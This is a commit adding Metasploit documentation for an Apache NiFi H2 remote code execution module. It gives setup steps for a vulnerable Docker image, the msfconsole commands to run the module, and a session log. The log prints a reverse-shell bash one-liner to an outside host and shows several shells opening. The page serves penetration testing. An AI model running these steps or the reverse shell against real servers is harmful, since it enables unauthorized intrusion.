apache nifi h2 rce
This commit is contained in:
h00die
@@ -0,0 +1,97 @@
|
||||
## Vulnerable Application
|
||||
|
||||
The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
|
||||
Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
|
||||
to configure a Database URL with the H2 driver that enables custom code execution.
|
||||
This exploit will create a new ExecuteSQL process, connect it to a DB Connection
|
||||
Pool, and create a new H2 based connection. The connection is able to create
|
||||
a new memory based h2 database on the fly, with a code execution inlined that
|
||||
executes when the H2 connection, and process are started.
|
||||
|
||||
This exploit will result in several shells (5-7).
|
||||
Successfully tested against Apache nifi 1.16.0 through 1.21.0.
|
||||
|
||||
### Vulnerable Docker Images
|
||||
|
||||
Docker images are available, and exploitable in the default configuration.
|
||||
|
||||
```
|
||||
docker run -p 8443:8443 apache/nifi:1.20.0
|
||||
```
|
||||
|
||||
After the image runs for a minute or two, you'll need to grab a set of credentials
|
||||
by running grep against the logs:
|
||||
|
||||
```
|
||||
docker logs [container_id] | grep Generated
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use exploit/linux/http/apache_nifi_h2_rce `
|
||||
1. Do: `set username [username]`
|
||||
1. Do: `set password [password]`
|
||||
1. Do: `set rhosts [ip]`
|
||||
1. Do: `set lhost [ip]`
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
### DELAY
|
||||
|
||||
The delay time before stopping and deleting the processor and DB connection pool. Defaults to `15`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Nifi 1.20.0 on Docker
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/apache_nifi_h2_rce
|
||||
[*] Using configured payload cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/http/apache_nifi_h2_rce) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf6 exploit(linux/http/apache_nifi_h2_rce) > set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
msf6 exploit(linux/http/apache_nifi_h2_rce) > set username 4b6caac4-e1c6-431d-8e63-f014a6541362
|
||||
username => 4b6caac4-e1c6-431d-8e63-f014a6541362
|
||||
msf6 exploit(linux/http/apache_nifi_h2_rce) > set password E3ke7kCROjBabztg0acFemg5xk2QiQs1
|
||||
password => E3ke7kCROjBabztg0acFemg5xk2QiQs1
|
||||
msf6 exploit(linux/http/apache_nifi_h2_rce) > set verbose true
|
||||
verbose => true
|
||||
msf6 exploit(linux/http/apache_nifi_h2_rce) > exploit
|
||||
|
||||
[+] bash -c '0<&126-;exec 126<>/dev/tcp/1.1.1.1/4444;sh <&126 >&126 2>&126'
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated. Apache NiFi instance supports logins and vulnerable version detected: 1.20.0
|
||||
[+] Retrieved process group: c34bfd91-0189-1000-a1ab-44dda04d471e
|
||||
[+] Created processor c34ccd20-0189-1000-5ee2-06eb40644237 in process group c34bfd91-0189-1000-a1ab-44dda04d471e
|
||||
[+] Configured processor c34ccd20-0189-1000-5ee2-06eb40644237
|
||||
[+] Configured db connection pool rkkIaE (c34cccc4-0189-1000-22c2-9fa3bb57d87b)
|
||||
[+] Enabling db connection pool
|
||||
[+] Starting processor
|
||||
[*] Command shell session 1 opened (1.1.1.1:4444 -> 172.17.0.2:49468) at 2023-08-04 21:25:44 -0400
|
||||
[*] Waiting 15 seconds before stopping and deleting
|
||||
[*] Command shell session 2 opened (1.1.1.1:4444 -> 172.17.0.2:49470) at 2023-08-04 21:25:45 -0400
|
||||
[*] Command shell session 3 opened (1.1.1.1:4444 -> 172.17.0.2:49478) at 2023-08-04 21:25:46 -0400
|
||||
[*] Command shell session 4 opened (1.1.1.1:4444 -> 172.17.0.2:49488) at 2023-08-04 21:25:49 -0400
|
||||
[*] Command shell session 6 opened (1.1.1.1:4444 -> 172.17.0.2:54526) at 2023-08-04 21:25:50 -0400
|
||||
[*] Command shell session 7 opened (1.1.1.1:4444 -> 172.17.0.2:54534) at 2023-08-04 21:25:51 -0400
|
||||
[+] Stopped and terminated processor c34ccd20-0189-1000-5ee2-06eb40644237
|
||||
[*] Found newer revision of c34ccd20-0189-1000-5ee2-06eb40644237, attempting to delete version 4
|
||||
[+] Deleted processor c34ccd20-0189-1000-5ee2-06eb40644237
|
||||
[+] Disabled db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b, sleeping 15 seconds to allow the connection to finish disabling
|
||||
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 1
|
||||
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 2
|
||||
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 3
|
||||
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 4
|
||||
[+] Deleted db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b
|
||||
|
||||
id
|
||||
uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)
|
||||
uname -a
|
||||
Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
Reference in New Issue
Block a user